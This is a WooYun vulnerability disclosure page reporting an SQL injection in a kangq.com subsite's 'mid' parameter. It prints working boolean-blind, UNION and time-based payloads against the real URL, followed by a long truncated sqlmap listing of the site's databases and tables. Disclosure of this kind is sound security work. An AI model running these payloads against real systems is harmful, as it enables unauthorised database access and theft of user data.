当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044008

漏洞标题:康Q网某分站SQL注入漏洞

相关厂商:kangq.com

漏洞作者: adm1n

提交时间:2013-11-26 15:40

修复时间:2014-01-10 15:41

公开时间:2014-01-10 15:41

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-26: 细节已通知厂商并且等待厂商处理中
2013-11-26: 厂商已经确认,细节仅向厂商公开
2013-12-06: 细节向核心白帽子及相关领域专家公开
2013-12-16: 细节向普通白帽子公开
2013-12-26: 细节向实习白帽子公开
2014-01-10: 细节向公众公开

简要描述:

康Q网SQL注入漏洞

详细说明:

1.http://vip.kangq.com/business.php?action=merchant&mid=137

漏洞证明:

Place: GET
Parameter: mid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=merchant&mid=137 AND 8741=8741
Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: action=merchant&mid=137 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71
6e6a7071,0x46786453466b4c64575a,0x7161617071),NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: action=merchant&mid=137 AND SLEEP(5)
---
[14:54:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[14:55:54] [INFO] fetching current user
current user: 'juer@192.168.0.%'
Database: themedb
[1 table]
+---------------------------------------+
| tb_theme |
+---------------------------------------+
Database: ju2account
[16 tables]
+---------------------------------------+
| acc_accounts |
| acc_affects |
| acc_affects_bak |
| acc_affects_error |
| acc_everyday_log |
| acc_item |
| acc_records |
| acc_records_bak |
| acc_records_bak_2011 |
| acc_records_error |
| acc_rule |
| acc_t1 |
| acc_t2 |
| tmp_byg_20121012_acc_accounts |
| tmp_byg_20121012_acc_accounts_mem |
| transrecord |
+---------------------------------------+
Database: kangqbbs
[113 tables]
+---------------------------------------+
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_addons |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachmentfields |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favoriteforums |
| cdb_favorites |
| cdb_favoritethreads |
| cdb_feeds |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_invitethread |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_memberrecommend |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_mytasks |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_postposition |
| cdb_postposition20110401_bak |
| cdb_postpositionforinner |
| cdb_posts |
| cdb_postsforinner |
| cdb_postsqianglou |
| cdb_postsqianglou20110303_bak |
| cdb_postsqianglou20110401_bak |
| cdb_postsqiangloulist |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_prompt |
| cdb_promptmsgs |
| cdb_prompttype |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsforinner |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usergroups |
| cdb_validating |
| cdb_warnings |
| cdb_words |
| tuan_vote |
+---------------------------------------+
Database: bbsdb
[249 tables]
+---------------------------------------+
| pre_common_addon |
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_connect_guest |
| pre_common_credit_log |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_devicetoken |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_crime |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_medal |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_stat_field |
| pre_common_member_stat_fieldcache |
| pre_common_member_stat_search |
| pre_common_member_stat_searchcache |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_patch |
| pre_common_plugin |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_report |
| pre_common_searchindex |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_word |
| pre_common_word_type |
| pre_connect_disktask |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_postfeedlog |
| pre_connect_tthreadlog |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_exif |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_collection |
| pre_forum_collectioncomment |
| pre_forum_collectionfollow |
| pre_forum_collectioninvite |
| pre_forum_collectionrelated |
| pre_forum_collectionteamworker |
| pre_forum_collectionthread |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupranking |
| pre_forum_groupuser |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_location |
| pre_forum_post_moderate |
| pre_forum_post_tableid |
| pre_forum_postcache |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_postposition |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_thread_moderate |
| pre_forum_threadaddviews |
| pre_forum_threadclass |
| pre_forum_threadclosed |
| pre_forum_threaddisablepos |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadpreview |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_warning |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blog_moderate |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_comment_moderate |
| pre_home_docomment |
| pre_home_doing |
| pre_home_doing_moderate |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_follow |
| pre_home_follow_feed |
| pre_home_follow_feed_archiver |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_pic_moderate |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_share_moderate |
| pre_home_show |
| pre_home_specialuser |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_viewlog |
| pre_home_visitor |
| pre_mobile_setting |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_moderate |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_comment_moderate |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_security_evilpost |
| pre_security_eviluser |
| pre_security_failedlog |
| pre_tools_censorhome |
| pre_tools_rule |
+---------------------------------------+
Database: dbv63www
[214 tables]
+---------------------------------------+
| manage_access_list |
| manage_access_relation |
| manage_depart_list |
| manage_user |
| ts_ad |
| ts_addons |
| ts_app |
| ts_app_tag |
| ts_area |
| ts_atme |
| ts_attach |
| ts_blog |
| ts_blog_albums |
| ts_blog_category |
| ts_blog_photo |
| ts_check_info |
| ts_collection |
| ts_comment |
| ts_credit_kqeveryday_log |
| ts_credit_kqlog |
| ts_credit_kqnewlog |
| ts_credit_setting |
| ts_credit_type |
| ts_credit_user |
| ts_denounce |
| ts_department |
| ts_diy_canvas |
| ts_diy_page |
| ts_diy_widget |
| ts_expression |
| ts_feed |
| ts_feed_data |
| ts_feed_digg |
| ts_feed_node |
| ts_feed_top |
| ts_feed_topic |
| ts_feed_topic_link |
| ts_feedback |
| ts_feedback_type |
| ts_find_password |
| ts_home_edu_topic |
| ts_invite_code |
| ts_kq_activity |
| ts_kq_activity_area |
| ts_kq_activity_attr |
| ts_kq_activity_cat |
| ts_kq_activity_seckillsub |
| ts_kq_activity_sell |
| ts_kq_cart |
| ts_kq_expense_card |
| ts_kq_goods |
| ts_kq_goods_brand |
| ts_kq_goods_cat |
| ts_kq_order_goods |
| ts_kq_order_info |
| ts_kqadvice |
| ts_kqapp_apply_manage |
| ts_kqapp_apply_sysversion |
| ts_kqapp_qifu_feedback |
| ts_kqapp_qifu_recode |
| ts_kqapp_qifu_user |
| ts_kqapp_user_info |
| ts_kqapp_user_reginfo |
| ts_kqcrm_customer |
| ts_kqcrm_review |
| ts_kqcw_temp |
| ts_kqedu_course |
| ts_kqedu_guide |
| ts_kqedu_month |
| ts_kqedu_mycourse |
| ts_kqedu_option |
| ts_kqedu_record |
| ts_kqedu_study |
| ts_kqedu_subject |
| ts_kqedu_type |
| ts_kqedu_visited |
| ts_kqexchange_gift |
| ts_kqexperts_remind |
| ts_kqflow |
| ts_kqguanggao |
| ts_kqguanggao_client |
| ts_kqguanggao_cls |
| ts_kqguanggao_column |
| ts_kqguanggao_datastyle |
| ts_kqguanggao_issue |
| ts_kqguanggao_position |
| ts_kqguanggao_stat |
| ts_kqguanggao_stat_log |
| ts_kqguanggao_stat_mon |
| ts_kqguanggao_template |
| ts_kqimg_url |
| ts_kqlife_act |
| ts_kqlife_actmember |
| ts_kqlife_area |
| ts_kqlife_audit |
| ts_kqlife_config |
| ts_kqlife_contract |
| ts_kqlife_coupon |
| ts_kqlife_coupon_log |
| ts_kqlife_cstore |
| ts_kqlife_merchant |
| ts_kqlife_mercheck |
| ts_kqlife_orderlist |
| ts_kqlife_sms |
| ts_kqlife_sort |
| ts_kqlife_store |
| ts_kqlife_tenants |
| ts_kqpay |
| ts_kqpay_list |
| ts_kqpilotpage_browserecode |
| ts_kqspace_title |
| ts_kqtrade_history |
| ts_kqtry_apply |
| ts_kqtry_item |
| ts_kqtry_reports |
| ts_kqtry_rereports |
| ts_kqtry_survey |
| ts_kqtry_typelist |
| ts_kquser_account |
| ts_kquser_account_detail |
| ts_kquser_activate |
| ts_kquser_address |
| ts_kquser_baby |
| ts_kquser_reimburse |
| ts_kqvip_card |
| ts_kqvip_cardcode |
| ts_kqvipcard_log |
| ts_kqvipin_stock |
| ts_kqvipout_stock |
| ts_lang |
| ts_login |
| ts_login_logs |
| ts_login_record |
| ts_medal |
| ts_medal_user |
| ts_message_content |
| ts_message_list |
| ts_message_member |
| ts_mobile_message |
| ts_mobile_token |
| ts_mobile_user |
| ts_navi |
| ts_notify_email |
| ts_notify_message |
| ts_notify_node |
| ts_online |
| ts_online_logs |
| ts_online_stats |
| ts_permission_group |
| ts_permission_node |
| ts_photo |
| ts_photo_album |
| ts_photo_index |
| ts_photo_mark |
| ts_pic_show |
| ts_schedule |
| ts_search |
| ts_search_key |
| ts_search_select |
| ts_system_config |
| ts_system_data |
| ts_system_update |
| ts_tag |
| ts_task |
| ts_task_custom |
| ts_task_receive |
| ts_task_reward |
| ts_task_user |
| ts_template |
| ts_template_record |
| ts_tipoff_status |
| ts_tips |
| ts_ucenter_user_link |
| ts_user |
| ts_user_app |
| ts_user_blacklist |
| ts_user_category |
| ts_user_category_link |
| ts_user_change_style |
| ts_user_count |
| ts_user_credit_history |
| ts_user_data |
| ts_user_department |
| ts_user_follow |
| ts_user_follow_group |
| ts_user_follow_group_link |
| ts_user_group |
| ts_user_group_link |
| ts_user_group_linkzj |
| ts_user_official |
| ts_user_official_category |
| ts_user_online |
| ts_user_privacy |
| ts_user_profile |
| ts_user_profile_setting |
| ts_user_verified |
| ts_user_verified_category |
| ts_vote |
| ts_vote_opt |
| ts_vote_user |
| ts_weiba |
| ts_weiba_apply |
| ts_weiba_category |
| ts_weiba_favorite |
| ts_weiba_follow |
| ts_weiba_log |
| ts_weiba_post |
| ts_weiba_reply |
| ts_x_article |
| ts_x_logs |
| ts_x_logs_2013_07 |
| ts_x_logs_2013_08 |
| ts_x_logs_2013_09 |
| ts_x_logs_2013_10 |
+---------------------------------------+
Database: kangq_listdb
[1 table]
+---------------------------------------+
| list_persons |
+---------------------------------------+
Database: passportdb
[31 tables]
+---------------------------------------+
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pm_indexes |
| uc_pm_lists |
| uc_pm_members |
| uc_pm_messages_0 |
| uc_pm_messages_1 |
| uc_pm_messages_2 |
| uc_pm_messages_3 |
| uc_pm_messages_4 |
| uc_pm_messages_5 |
| uc_pm_messages_6 |
| uc_pm_messages_7 |
| uc_pm_messages_8 |
| uc_pm_messages_9 |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+---------------------------------------+
Database: ju2_ask
[86 tables]
+---------------------------------------+
| _test_1 |
| ask_answer_autiding_list2010 |
| ask_answer_list |
| ask_answer_list2010 |
| ask_auditing_list2010 |
| ask_disease_answer_001 |
| ask_disease_answer_002 |
| ask_disease_answer_003 |
| ask_disease_answer_004 |
| ask_disease_answer_005 |
| ask_disease_answer_006 |
| ask_disease_answer_007 |
| ask_disease_answer_008 |
| ask_disease_answer_009 |
| ask_disease_answer_010 |
| ask_disease_answer_011 |
| ask_disease_answer_012 |
| ask_disease_answer_013 |
| ask_disease_answer_014 |
| ask_disease_answer_015 |
| ask_disease_answer_016 |
| ask_disease_answer_017 |
| ask_disease_answer_018 |
| ask_disease_answer_019 |
| ask_disease_answer_020 |
| ask_disease_answer_021 |
| ask_disease_answer_022 |
| ask_disease_answer_030 |
| ask_disease_answer_031 |
| ask_disease_answer_032 |
| ask_disease_answer_033 |
| ask_disease_answer_034 |
| ask_disease_answer_035 |
| ask_disease_answer_036 |
| ask_disease_answer_037 |
| ask_disease_answer_038 |
| ask_disease_answer_039 |
| ask_disease_answer_040 |
| ask_disease_answer_041 |
| ask_disease_answer_new |
| ask_disease_category_stat |
| ask_disease_question_001 |
| ask_disease_question_002 |
| ask_disease_question_003 |
| ask_disease_question_004 |
| ask_disease_question_005 |
| ask_disease_question_006 |
| ask_disease_question_007 |
| ask_disease_question_008 |
| ask_disease_question_009 |
| ask_disease_question_010 |
| ask_disease_question_011 |
| ask_disease_question_012 |
| ask_disease_question_013 |
| ask_disease_question_014 |
| ask_disease_question_015 |
| ask_disease_question_016 |
| ask_disease_question_017 |
| ask_disease_question_018 |
| ask_disease_question_019 |
| ask_disease_question_020 |
| ask_disease_question_021 |
| ask_disease_question_022 |
| ask_disease_question_030 |
| ask_disease_question_031 |
| ask_disease_question_032 |
| ask_disease_question_033 |
| ask_disease_question_034 |
| ask_disease_question_035 |
| ask_disease_question_036 |
| ask_disease_question_037 |
| ask_disease_question_038 |
| ask_disease_question_039 |
| ask_disease_question_040 |
| ask_disease_question_041 |
| ask_disease_stat |
| ask_disease_toindex |
| ask_disease_user |
| ask_source_list |
| ask_source_list2010 |
| ask_user_stat |
| kangq_darren_ask |
| my_uuid |
| tmp_guolv |
| tmp_guolvdel |
| tmp_qid |
+---------------------------------------+
Database: health
[15 tables]
+---------------------------------------+
| 39jb_disease |
| 39jb_keshi |
| 39jb_keshi_bk |
| 39jb_keshi_disease |
| 39jb_keshi_disease_bk |
| 39jb_keshi_disease_d |
| TA_BASEINFO |
| category |
| haodf_doctor |
| haodf_faculty |
| haodf_hospital |
| haodf_hospital_sky |
| haodf_region |
| ju2_food |
| test |
+---------------------------------------+
Database: appdb
[5 tables]
+---------------------------------------+
| app_apply_manage |
| app_apply_sysversion |
| app_qifu_feedback |
| app_qifu_recode |
| app_qifu_user |
+---------------------------------------+
Database: ju2_log
[288 tables]
+---------------------------------------+
| association_log |
| cms_log |
| juer_log_20110301 |
| juer_log_20110302 |
| juer_log_20110303 |
| juer_log_20110304 |
| juer_log_20110305 |
| juer_log_20110306 |
| juer_log_20110307 |
| juer_log_20110308 |
| juer_log_20110309 |
| juer_log_20110310 |
| juer_log_20110311 |
| juer_log_20110312 |
| juer_log_20110313 |
| juer_log_20110314 |
| juer_log_20110315 |
| juer_log_20110316 |
| juer_log_20110317 |
| juer_log_20110318 |
| juer_log_20110319 |
| juer_log_20110320 |
| juer_log_20110321 |
| juer_log_20110322 |
| juer_log_20110323 |
| juer_log_20110324 |
| juer_log_20110325 |
| juer_log_20110326 |
| juer_log_20110327 |
| juer_log_20110328 |
| juer_log_20110329 |
| juer_log_20110330 |
| juer_log_20110331 |
| juer_log_20110401 |
| juer_log_20110402 |
| juer_log_20110403 |
| juer_log_20110404 |
| juer_log_20110405 |
| juer_log_20110406 |
| juer_log_20110407 |
| juer_log_20110408 |
| juer_log_20110409 |
| juer_log_20110410 |
| juer_log_20110411 |
| juer_log_20110412 |
| juer_log_20110413 |
| juer_log_20110414 |
| juer_log_20110415 |
| juer_log_20110416 |
| juer_log_20110417 |
| juer_log_20110418 |
| juer_log_20110419 |
| juer_log_20110420 |
| juer_log_20110421 |
| juer_log_20110422 |
| juer_log_20110423 |
| juer_log_20110424 |
| juer_log_20110425 |
| juer_log_20110426 |
| juer_log_20110427 |
| juer_log_20110428 |
| juer_log_20110429 |
| juer_log_20110430 |
| juer_log_20110501 |
| juer_log_20110502 |
| juer_log_20110503 |
| juer_log_20110504 |
| juer_log_20110505 |
| juer_log_20110506 |
| juer_log_20110507 |
| juer_log_20110508 |
| juer_log_20110509 |
| juer_log_20110510 |
| juer_log_20110511 |
| juer_log_20110512 |
| juer_log_20110513 |
| juer_log_20110514 |
| juer_log_20110515 |
| juer_log_20110516 |
| juer_log_20110517 |
| juer_log_20110518 |
| juer_log_20110519 |
| juer_log_20110520 |
| juer_log_20110521 |
| juer_log_20110522 |
| juer_log_20110523 |
| juer_log_20110524 |
| juer_log_20110525 |
| juer_log_20110526 |
| juer_log_20110527 |
| juer_log_20110528 |
| juer_log_20110529 |
| juer_log_20110530 |
| juer_log_20110531 |
| juer_log_20110601 |
| juer_log_20110602 |
| juer_log_20110603 |
| juer_log_20110604 |
| juer_log_20110605 |
| juer_log_20110606 |
| juer_log_20110607 |
| juer_log_20110608 |
| juer_log_20110609 |
| juer_log_20110610 |
| juer_log_20110611 |
| juer_log_20110612 |
| juer_log_20110613 |
| juer_log_20110614 |
| juer_log_20110615 |
| juer_log_20110616 |
| juer_log_20110617 |
| juer_log_20110618 |
| juer_log_20110619 |
| juer_log_20110620 |
| juer_log_20110621 |
| juer_log_20110622 |
| juer_log_20110623 |
| juer_log_20110624 |
| juer_log_20110625 |
| juer_log_20110626 |
| juer_log_20110627 |
| juer_log_20110628 |
| juer_log_20110629 |
| juer_log_20110630 |
| juer_log_20110701 |
| juer_log_20110702 |
| juer_log_20110703 |
| juer_log_20110704 |
| juer_log_20110705 |
| juer_log_20110706 |
| juer_log_20110707 |
| juer_log_20110708 |
| juer_log_20110709 |
| juer_log_20110710 |
| juer_log_20110711 |
| juer_log_20110712 |
| juer_log_20110713 |
| juer_log_20110714 |
| juer_log_20110715 |
| juer_log_20110716 |
| juer_log_20110717 |
| juer_log_20110718 |
| juer_log_20110719 |
| juer_log_20110720 |
| juer_log_20110721 |
| juer_log_20110722 |
| juer_log_20110723 |
| juer_log_20110724 |
| juer_log_20110725 |
| juer_log_20110726 |
| juer_log_20110727 |
| juer_log_20110728 |
| juer_log_20110729 |
| juer_log_20110730 |
| juer_log_20110731 |
| juer_log_20110801 |
| juer_log_20110802 |
| juer_log_20110803 |
| juer_log_20110804 |
| juer_log_20110805 |
| juer_log_20110806 |
| juer_log_20110807 |
| juer_log_20110808 |
| juer_log_20110809 |
| juer_log_20110810 |
| juer_log_20110811 |
| juer_log_20110812 |
| juer_log_20110813 |
| juer_log_20110814 |
| juer_log_20110815 |
| juer_log_20110816 |
| juer_log_20110817 |
| juer_log_20110818 |
| juer_log_20110819 |
| juer_log_20110820 |
| juer_log_20110821 |
| juer_log_20110822 |
| juer_log_20110823 |
| juer_log_20110824 |
| juer_log_20110825 |
| juer_log_20110826 |
| juer_log_20110827 |
| juer_log_20110828 |
| juer_log_20110829 |
| juer_log_20110830 |
| juer_log_20110831 |
| juer_log_20110901 |
| juer_log_20110902 |
| juer_log_20110903 |
| juer_log_20110904 |
| juer_log_20110905 |
| juer_log_20110906 |
| juer_log_20110907 |
| juer_log_20110908 |
| juer_log_20110909 |
| juer_log_20110910 |
| juer_log_20110911 |
| juer_log_20110912 |
| juer_log_20110913 |
| juer_log_20110914 |
| juer_log_20110915 |
| juer_log_20110916 |
| juer_log_20110917 |
| juer_log_20110918 |
| juer_log_20110919 |
| juer_log_20110920 |
| juer_log_20110921 |
| juer_log_20110922 |
| juer_log_20110923 |
| juer_log_20110924 |
| juer_log_20110925 |
| juer_log_20110926 |
| juer_log_20110927 |
| juer_log_20110928 |
| juer_log_20110929 |
| juer_log_20110930 |
| juer_log_20111001 |
| juer_log_20111002 |
| juer_log_20111003 |
| juer_log_20111004 |
| juer_log_20111005 |
| juer_log_20111006 |
| juer_log_20111007 |
| juer_log_20111008 |
| juer_log_20111009 |
| juer_log_20111010 |
| juer_log_20111011 |
| juer_log_20111012 |
| juer_log_20111013 |
| juer_log_20111014 |
| juer_log_20111015 |
| juer_log_20111016 |
| juer_log_20111017 |
| juer_log_20111018 |
| juer_log_20111019 |
| juer_log_20111020 |
| juer_log_20111021 |
| juer_log_20111022 |
| juer_log_20111023 |
| juer_log_20111024 |
| juer_log_20111025 |
| juer_log_20111026 |
| juer_log_20111027 |
| juer_log_20111028 |
| juer_log_20111029 |
| juer_log_20111030 |
| juer_log_20111031 |
| juer_log_20111101 |
| juer_log_20111102 |
| juer_log_20111103 |
| juer_log_20111104 |
| juer_log_20111105 |
| juer_log_20111106 |
| juer_log_20111107 |
| juer_log_20111108 |
| juer_log_20111109 |
| juer_log_20111110 |
| juer_log_20111111 |
| juer_log_20111112 |
| juer_log_20111113 |
| juer_log_20111114 |
| juer_log_20111115 |
| juer_log_20111116 |
| juer_log_20111117 |
| juer_log_20111118 |
| juer_log_20111119 |
| juer_log_20111120 |
| juer_log_20111121 |
| juer_log_20111122 |
| juer_log_20111123 |
| juer_log_20111124 |
| juer_log_20111125 |
| juer_log_20111126 |
| juer_log_20111127 |
| juer_log_20111128 |
| juer_log_20111129 |
| juer_stat_item |
| juer_stat_total_201011 |
| juer_stat_total_201012 |
| juer_stat_total_201102 |
| juer_stat_total_201108 |
| juer_stat_total_201206 |
| juer_stat_total_201207 |
| ncms_user_stat |
| ncms_user_stat_log |
| stat_opts_list |
| stat_user_opts |
| stat_user_opts_log |
+---------------------------------------+
Database: kangq_researchdb
[9 tables]
+---------------------------------------+
| research_answer |
| research_group |
| research_log |
| research_question |
| research_signup |
| research_signup_photo |
| research_temp_user |
| research_user_answer |
| research_user_group |
+---------------------------------------+
Database: juer
[486 tables]
+---------------------------------------+
| 360heart_article |
| 360heart_article_class |
| 360heart_donation |
| 360heart_school |
| 360heart_volunteer |
| _blog_uservip |
| act_autumn_logs |
| act_autumn_present |
| act_autumn_prize |
| act_autumn_prize_category |
| act_autumn_prize_subject |
| act_autumn_user |
| act_dou_logs |
| act_dou_user |
| act_dream_user |
| act_gift_log |
| act_item |
| act_jingjia |
| act_join |
| act_lottery_logs |
| act_user_temp |
| act_vote |
| act_vote_1 |
| act_vote_temp |
| app_jpmm_sysversion |
| app_user_info |
| baby_card |
| baby_test_list |
| baby_vaccination |
| baby_vaccination_list |
| baby_vaccination_record |
| baby_vip |
| blog_addr |
| blog_advt |
| blog_albums |
| blog_app |
| blog_balbum_tpls |
| blog_balbums |
| blog_bbsclass |
| blog_bgsqlcv |
| blog_blog |
| blog_blogfriend |
| blog_blogfriendg |
| blog_bloginfo |
| blog_blogvote |
| blog_bookmark |
| blog_btags |
| blog_carticle |
| blog_categories |
| blog_collections |
| blog_comment |
| blog_footprint |
| blog_friendmark |
| blog_gbook |
| blog_gift |
| blog_gift_log |
| blog_giftmy |
| blog_group |
| blog_hobby |
| blog_hobbyitem |
| blog_hotaction |
| blog_item |
| blog_itemnav |
| blog_itemrelate |
| blog_items |
| blog_itemtype |
| blog_lcustom |
| blog_luck_record |
| blog_malbums |
| blog_module |
| blog_modules |
| blog_modules_conf |
| blog_msg_view |
| blog_msgs |
| blog_music |
| blog_notice |
| blog_onlinetime_log |
| blog_photo |
| blog_photo_sjp |
| blog_photo_vote_log |
| blog_pwd_log |
| blog_replace |
| blog_rightset |
| blog_schindex |
| blog_setforms |
| blog_setting |
| blog_share |
| blog_smile |
| blog_space_color |
| blog_space_diy |
| blog_space_style |
| blog_style |
| blog_taginfo |
| blog_task |
| blog_task_log |
| blog_task_new |
| blog_task_record |
| blog_task_record_new |
| blog_tblog |
| blog_team |
| blog_template |
| blog_tgbook |
| blog_tuser |
| blog_upload |
| blog_user |
| blog_user_app |
| blog_user_ext |
| blog_userhobby |
| blog_userinfo |
| blog_userskin |
| blog_uservip |
| blog_vip |
| blog_vip_renew |
| blog_vipcard |
| blog_voteitem |
| blog_voterecord |
| blog_zhengwen |
| blog_zjgrade |
| bygdel_ju2_group_phoact_posts |
| card_log |
| ch_user |
| cms_addonarticle |
| cms_addonflash |
| cms_addonimages |
| cms_addoninfos |
| cms_addonproduct |
| cms_addonsoft |
| cms_addonspec |
| cms_admin |
| cms_admintype |
| cms_adminvest |
| cms_arcatt |
| cms_arccache |
| cms_arccache_full |
| cms_archives |
| cms_archivesspec |
| cms_arcrank |
| cms_arctype |
| cms_area |
| cms_ask |
| cms_askanswer |
| cms_asktype |
| cms_batch_update_backup |
| cms_cache_feedbackurl |
| cms_channeltype |
| cms_co_exrule |
| cms_co_listenurl |
| cms_co_mediaurl |
| cms_conote |
| cms_courl |
| cms_error |
| cms_feedback |
| cms_flink |
| cms_flinktype |
| cms_freelist |
| cms_friends |
| cms_full_search |
| cms_guestbook |
| cms_help |
| cms_homepageset |
| cms_infos |
